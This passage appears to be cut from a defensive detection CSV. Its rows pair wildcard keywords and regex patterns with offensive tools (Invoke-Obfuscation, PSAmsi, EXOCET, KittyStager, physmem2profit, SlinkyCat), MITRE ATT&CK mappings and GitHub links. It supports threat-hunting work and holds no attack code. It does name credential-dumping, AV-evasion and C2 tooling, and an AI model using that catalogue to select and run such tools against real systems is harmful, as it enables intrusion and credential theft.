Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54186" "*Out-ObfuscatedScriptBlockExpressionAst *",".{0,1000}Out\-ObfuscatedScriptBlockExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54187" "*Out-ObfuscatedStatementAst *",".{0,1000}Out\-ObfuscatedStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54188" "*Out-ObfuscatedStatementAst *",".{0,1000}Out\-ObfuscatedStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54189" "*Out-ObfuscatedStatementBlockAst *",".{0,1000}Out\-ObfuscatedStatementBlockAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54190" "*Out-ObfuscatedStatementBlockAst *",".{0,1000}Out\-ObfuscatedStatementBlockAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54191" "*Out-ObfuscatedStringCommand*",".{0,1000}Out\-ObfuscatedStringCommand.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54192" "*Out-ObfuscatedStringCommand*",".{0,1000}Out\-ObfuscatedStringCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54193" "*Out-ObfuscatedStringCommand.ps1*",".{0,1000}Out\-ObfuscatedStringCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54194" 
"*Out-ObfuscatedStringCommand.ps1*",".{0,1000}Out\-ObfuscatedStringCommand\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","54195" "*Out-ObfuscatedStringConstantExpressionAst *",".{0,1000}Out\-ObfuscatedStringConstantExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54196" "*Out-ObfuscatedStringConstantExpressionAst *",".{0,1000}Out\-ObfuscatedStringConstantExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54197" "*Out-ObfuscatedSubExpressionAst *",".{0,1000}Out\-ObfuscatedSubExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54198" "*Out-ObfuscatedSubExpressionAst *",".{0,1000}Out\-ObfuscatedSubExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer 
wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54199" "*Out-ObfuscatedSwitchStatementAst *",".{0,1000}Out\-ObfuscatedSwitchStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54200" "*Out-ObfuscatedSwitchStatementAst *",".{0,1000}Out\-ObfuscatedSwitchStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54201" "*Out-ObfuscatedThrowStatementAst *",".{0,1000}Out\-ObfuscatedThrowStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54202" "*Out-ObfuscatedThrowStatementAst *",".{0,1000}Out\-ObfuscatedThrowStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - 
T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54203" "*Out-ObfuscatedTokenCommand*",".{0,1000}Out\-ObfuscatedTokenCommand.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54204" "*Out-ObfuscatedTokenCommand*",".{0,1000}Out\-ObfuscatedTokenCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54205" "*Out-ObfuscatedTokenCommand.ps1*",".{0,1000}Out\-ObfuscatedTokenCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54206" "*Out-ObfuscatedTokenCommand.ps1*",".{0,1000}Out\-ObfuscatedTokenCommand\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","54207" 
"*Out-ObfuscatedTrapStatementAst *",".{0,1000}Out\-ObfuscatedTrapStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54208" "*Out-ObfuscatedTrapStatementAst *",".{0,1000}Out\-ObfuscatedTrapStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54209" "*Out-ObfuscatedTryStatementAst *",".{0,1000}Out\-ObfuscatedTryStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54210" "*Out-ObfuscatedTryStatementAst *",".{0,1000}Out\-ObfuscatedTryStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54211" "*Out-ObfuscatedTypeConstraintAst 
*",".{0,1000}Out\-ObfuscatedTypeConstraintAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54212" "*Out-ObfuscatedTypeConstraintAst *",".{0,1000}Out\-ObfuscatedTypeConstraintAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54213" "*Out-ObfuscatedTypeDefinitionAst *",".{0,1000}Out\-ObfuscatedTypeDefinitionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54214" "*Out-ObfuscatedTypeDefinitionAst *",".{0,1000}Out\-ObfuscatedTypeDefinitionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54215" "*Out-ObfuscatedTypeExpressionAst *",".{0,1000}Out\-ObfuscatedTypeExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a 
PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54216" "*Out-ObfuscatedTypeExpressionAst *",".{0,1000}Out\-ObfuscatedTypeExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54217" "*Out-ObfuscatedUnaryExpressionAst *",".{0,1000}Out\-ObfuscatedUnaryExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54218" "*Out-ObfuscatedUnaryExpressionAst *",".{0,1000}Out\-ObfuscatedUnaryExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54219" "*Out-ObfuscatedUsingExpressionAst *",".{0,1000}Out\-ObfuscatedUsingExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - 
TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54220" "*Out-ObfuscatedUsingExpressionAst *",".{0,1000}Out\-ObfuscatedUsingExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54221" "*Out-ObfuscatedUsingStatementAst *",".{0,1000}Out\-ObfuscatedUsingStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54222" "*Out-ObfuscatedUsingStatementAst *",".{0,1000}Out\-ObfuscatedUsingStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54223" "*Out-ObfuscatedVariableExpressionAst *",".{0,1000}Out\-ObfuscatedVariableExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54224" "*Out-ObfuscatedVariableExpressionAst *",".{0,1000}Out\-ObfuscatedVariableExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54225" "*Out-ObfuscatedWhileStatementAst *",".{0,1000}Out\-ObfuscatedWhileStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54226" "*Out-ObfuscatedWhileStatementAst *",".{0,1000}Out\-ObfuscatedWhileStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54227" "*Out-ParenthesizedString *",".{0,1000}Out\-ParenthesizedString\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54228" 
"*Out-PasteBin.ps1*",".{0,1000}Out\-PasteBin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","54229" "*Output malware sample selected: *",".{0,1000}Output\smalware\ssample\sselected\:\s.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","54230" "*output*kitten.exe*",".{0,1000}output.{0,1000}kitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","54232" "*output*-lsass.dmp*",".{0,1000}output.{0,1000}\-lsass\.dmp.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","54233" "*Output.aes.zip*",".{0,1000}Output\.aes\.zip.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","54234" "*output/AccountsWithSPN.txt*",".{0,1000}output\/AccountsWithSPN\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54235" "*output/AdminAccessComputers.txt*",".{0,1000}output\/AdminAccessComputers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD 
Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54236" "*output/AllDomainControllers.txt*",".{0,1000}output\/AllDomainControllers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54237" "*output/AllDomainGroups.txt*",".{0,1000}output\/AllDomainGroups\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54238" "*output/AllDomainHosts.txt*",".{0,1000}output\/AllDomainHosts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54239" "*output/AllDomainUserAccounts.txt*",".{0,1000}output\/AllDomainUserAccounts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54240" "*output/AllDomainUsers.txt*",".{0,1000}output\/AllDomainUsers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD 
Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54241" "*output/AllServers.txt*",".{0,1000}output\/AllServers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54242" "*output/AllServers2k12.txt*",".{0,1000}output\/AllServers2k12\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54243" "*output/AllServers2k16.txt*",".{0,1000}output\/AllServers2k16\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54244" "*output/AllServers2k19.txt*",".{0,1000}output\/AllServers2k19\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54245" "*output/AllServers2k22.txt*",".{0,1000}output\/AllServers2k22\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD 
Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54246" "*output/AllServers2k8.txt*",".{0,1000}output\/AllServers2k8\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54247" "*output/AllTrusts.txt*",".{0,1000}output\/AllTrusts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54248" "*output/CompletedDescriptionField.txt*",".{0,1000}output\/CompletedDescriptionField\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54249" "*output/DescriptionContainsPass.txt*",".{0,1000}output\/DescriptionContainsPass\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54250" "*output/DNETAccountsByDescription.txt*",".{0,1000}output\/DNETAccountsByDescription\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD 
